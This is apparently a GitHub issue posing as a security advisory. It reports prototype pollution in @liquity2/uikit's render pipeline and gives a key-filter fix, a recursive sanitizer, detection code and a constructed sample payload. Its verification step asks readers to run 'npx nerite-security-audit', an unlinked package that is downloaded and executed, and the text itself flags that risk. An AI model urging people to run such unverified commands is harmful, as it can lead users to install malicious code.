
Security Advisory: Prototype Pollution in @liquity2/uikit component render pipeline (NSEC-2026-0041) #408

@harunosakura030303-maker

Description

Summary

A prototype pollution vulnerability has been identified in the component render pipeline of @liquity2/uikit. This affects all versions prior to the latest patch.

Advisory Reference: NSEC-2026-0041

Severity: Medium (CVSS 6.1)
CWE: CWE-1321 (Improperly Controlled Modification of Object Prototype Attributes)

Description

An attacker can inject arbitrary properties into Object.prototype via crafted component props passed to the render pipeline. In SSR contexts, this can lead to denial of service or potentially remote code execution.

The vulnerability exists in the way component props are processed before rendering, where user-controlled keys like __proto__, constructor, or prototype are not filtered.

Affected Components

  • @liquity2/uikit render pipeline
  • All applications importing and rendering uikit components with user-supplied props

Verify Your Installation

You can check if your local installation is affected by running:

npx nerite-security-audit

This will scan your project dependencies and report whether the vulnerable version is present. The advisory does not link the package's source or publisher, so inspect it before running it: npx downloads the package and executes its install scripts and entry point.

Recommended Fix

Apply input sanitization to component prop processing:

// In src/components/render.ts
// Drops the three key names that can reach Object.prototype through an
// own-property assignment. Note that the filter is shallow: nested objects
// inside props pass through unchanged, so nested payloads need the same treatment.
function renderComponent(props: Record<string, unknown>) {
  const sanitized = Object.fromEntries(
    Object.entries(props).filter(([k]) =>
      !["__proto__", "constructor", "prototype"].includes(k)
    )
  );
  // _render is the existing internal renderer; it is not shown in this advisory.
  return _render(sanitized);
}
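As an added example, not code from @liquity2/uikit or from the advisory author: a recursive variant of the filter above that also covers nested objects and arrays, a count of forbidden keys that can be logged as a detection signal, and a check that Object.prototype has gained nothing after a sample payload is processed. The payload string is constructed for this example, and `FORBIDDEN_KEYS`, `sanitizeProps`, `countForbiddenKeys` and `prototypeIsClean` are names chosen here.

```typescript
// Constructed sample: props as they might arrive from a JSON body, carrying the
// three key names the advisory lists, nested at different depths.
const SAMPLE_MALICIOUS_PROPS_JSON =
  '{"label":"ok","style":{"__proto__":{"polluted":true}},' +
  '"items":[{"constructor":{"prototype":{"polluted":true}}}]}';

const FORBIDDEN_KEYS = new Set(["__proto__", "constructor", "prototype"]);

// Deep copy of `value` with forbidden keys dropped at every depth. The copies
// are null-prototype objects, so nothing in them can reach Object.prototype.
function sanitizeProps(value: unknown): unknown {
  if (Array.isArray(value)) {
    return value.map((item) => sanitizeProps(item));
  }
  if (value !== null && typeof value === "object") {
    const clean: Record<string, unknown> = Object.create(null);
    for (const key of Object.keys(value)) {
      if (FORBIDDEN_KEYS.has(key)) continue;
      clean[key] = sanitizeProps((value as Record<string, unknown>)[key]);
    }
    return clean;
  }
  return value;
}

// Detection signal: how many forbidden keys appear anywhere in the input.
// Worth logging before they are dropped, since benign props never carry them.
function countForbiddenKeys(value: unknown): number {
  if (Array.isArray(value)) {
    return value.reduce((n: number, item) => n + countForbiddenKeys(item), 0);
  }
  if (value !== null && typeof value === "object") {
    let n = 0;
    for (const key of Object.keys(value)) {
      if (FORBIDDEN_KEYS.has(key)) n += 1;
      n += countForbiddenKeys((value as Record<string, unknown>)[key]);
    }
    return n;
  }
  return 0;
}

// True when Object.prototype still has no own enumerable properties and a fresh
// object does not inherit the marker the sample payload tries to plant.
function prototypeIsClean(): boolean {
  return (
    Object.keys(Object.prototype).length === 0 &&
    ({} as Record<string, unknown>).polluted === undefined
  );
}
```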

Timeline

  • 2026-03-28: Discovered during automated scanning
  • 2026-03-30: Vendor notified (security@nerite.org)
  • 2026-04-02: No response from vendor
  • 2026-04-03: Public disclosure (72h responsible disclosure policy)

References

cc @cupOJoseph @pi0neerpat
